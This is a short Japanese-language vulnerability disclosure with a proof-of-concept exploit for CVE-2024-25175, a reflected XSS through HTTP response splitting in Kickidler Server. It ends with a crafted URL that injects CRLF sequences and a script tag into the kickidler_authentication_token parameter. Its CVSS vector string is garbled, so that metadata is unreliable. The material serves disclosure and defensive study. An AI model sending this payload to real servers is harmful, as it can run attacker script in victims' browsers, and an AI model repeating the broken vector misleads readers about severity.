
CVE-2024-25175の概念実証エクスプロイト:Kickidler Server 1.107.0より前のバージョンにおける、HTTPレスポンス分割を介した反射型XSS。CVSS 6.1、再現手順付き。
説明: この脆弱性を悪用すると、特別に細工されたリンクをクリックした際に、被害者のブラウザでJavaScriptコードが実行される(クロスサイトスクリプティング)可能性があります。この脆弱性は、Webサーバーが改行(\r\n または CR\LF、urlencodeでは %0d%0a)を正しく処理しないために発生します。
影響: 反射型XSS
CVSSv3.1ベクター: AV:N/AC:L/PR:N/UI:R/S:C:C/L:I/L:A:N (6.1)
CWE: CWE-20: 不適切な入力検証
影響を受けるコンポーネント: GETパラメータ kickidler_authentication_token
ベンダー: Kickidler: 従業員監視ソフトウェア
http://[IP_kickdler_server]:8123/?kickidler_authentication_token=test%0d%0a%0d%0a%3Cscript%3Ealert(document.domain)%3C/script%3E
